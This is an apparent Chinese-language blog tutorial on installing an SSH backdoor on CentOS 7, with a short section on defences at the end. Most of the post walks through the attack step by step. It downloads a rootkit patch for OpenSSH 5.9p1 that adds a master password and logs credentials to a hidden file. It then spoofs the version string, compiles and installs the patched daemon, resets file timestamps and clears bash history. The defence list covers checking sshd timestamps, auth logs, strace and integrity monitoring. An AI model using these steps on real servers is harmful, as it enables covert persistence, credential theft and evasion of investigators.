0
点赞
收藏
分享

微信扫一扫

ssh后门介绍与防御


文章目录

  • ​​1 介绍​​
  • ​​2 实战演练​​
  • ​​2.1 查看版本​​
  • ​​2.2 下载SSH配置文件​​
  • ​​2.3 安装​​
  • ​​2.4 修改后门密码and文件记录​​
  • ​​2.5 编译安装​​
  • ​​2.6 摸出痕迹​​
  • ​​3 防御ssh后门​​

1 介绍

当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。

2 实战演练

实验环境:Centos7

2.1 查看版本

ssh -v

ssh后门介绍与防御_网络安全


可以对ssh备份配置文件,可以对后期的文件时间进行修改

cp -p /etc/ssh/ssh_config  / etc/ssh/ssh_config.bak

cp -p /etc/ssh/ sshd_config  /etc/ssh/sshd_config.bak

2.2 下载SSH配置文件

官网:​​http://www.openssh.com/​​

openssh-5.9p1.tar.gz
openssh-5.9p1.patch.tar.gz

http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

2.3 安装

上传方法:中国蚁剑等

tar -zx vf openssh-5.9p1.tar.gz

tar -zx vf openssh-5.9p1.patch.tar.gz

将​​openssh-5.9p1.patch​​​中的​​sshbd5.9p1.diff​​​复制到​​openssh-5.9p1​​中

cp ./openssh-5.9p1.patch/sshbd5.9p1.diff ./openssh-5.9p1/sshbd5.9p1.diff

在​​openssh-5.9p1​​中执行

patch < sshbd5.9p1.diff

如果patch 未安装

yum -y install patch。

ssh后门介绍与防御_编译安装_02

2.4 修改后门密码and文件记录

vim includes.h

ssh后门介绍与防御_编译安装_03


可以修改后门密码和记录文件,文件前面加 ​​.​​相当于隐藏文件,也可以修改个隐蔽目录

修改后

ssh后门介绍与防御_外网_04


修改版本

原则:修改为与我们刚才查看的版本信息一致,使其不易被发现。

vim version.h

ssh后门介绍与防御_kali linux_05


ssh后门介绍与防御_kali linux_06

2.5 编译安装

CentOS 7
首先对ssh里面的几个key的权限进行修改,否则可能进行编译的时候key不能修改而报错。

chmod 620 moduli
chmod 600 /etc/ssh/ssh_host_ed25519_key
chmod 600 /etc/ssh/ssh_host_ecdsa_key
chmod 600 /etc/ssh/ssh_host_rsa_key
chmod 600 /etc/ssh/ssh_host_ed25519_key

安装所需环境

yum install -y openssl openssl-devel pam-devel

编译安装

./configure --prefix=/usr --sysconfdir=/etc/ssh、

make && make install

service sshd restart

使用我们的后门密码可以正常登陆,以前的密码也有记录,实验成功

2.6 摸出痕迹

touch -r 老文件时间戳 新文件时间戳

touch -r /etc/ssh/ssh_config.bak / etc/ssh/ssh_config

touch -r /etc/ssh/sshd_config.bak / etc/ssh/sshd_config

清除操作日志

echo >/root/.bash_history //清空操作日志

还有log什么的

3 防御ssh后门

  1. 重装openssh,更新到最新版本
  2. 将SSH默认登录端口22改为其他端口
  3. IPTable中添加SSH访问策略
  4. 查看ssh配置文件和/usr/sbin/sshd的时间

stat /usr/sbin/sshd

  1. 查看安全日志

more /var/log/secure |grep Accepted

排查ip

ssh后门介绍与防御_外网_07

  1. 通过strace监控sshd进程读写文件的操作一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。

ps axu | grep sshd | grep -v grep

端口监控:内网监控和外网监控:外网端口通过白名单控制,严禁私自开启外网端口;内网端口变化性比较大,需要多研究。

文件监控:
建立起文件监控体系,周期性检测文件的完整性,监控文件的权限变化。匹配软件MD5值以免软件被替换

配置安全:做好基线检测,服务器被入侵后,往往会修改用户配置,而通常hids并不会去检测文件的内容。基线配置的建立就显得尤为重要

流量检测:这一点常见的hids都能实现,snort什么的,关键是各种防御体系的联动以及分析,提取出安全事件,进而提升到威胁情报

参考文章:
​ https://hu3sky.github.io/2018/09/06/%E5%90%8E%E9%97%A8/​​

ubuntu有一点差异,参考下面文章
​ https://www.jianshu.com/p/c1cd73b072f1​​

​​https://www.secpulse.com/archives/69093.html​​


举报

相关推荐

后门原理与实践

phpstudy后门

Web 框架与 CSRF 防御

0 条评论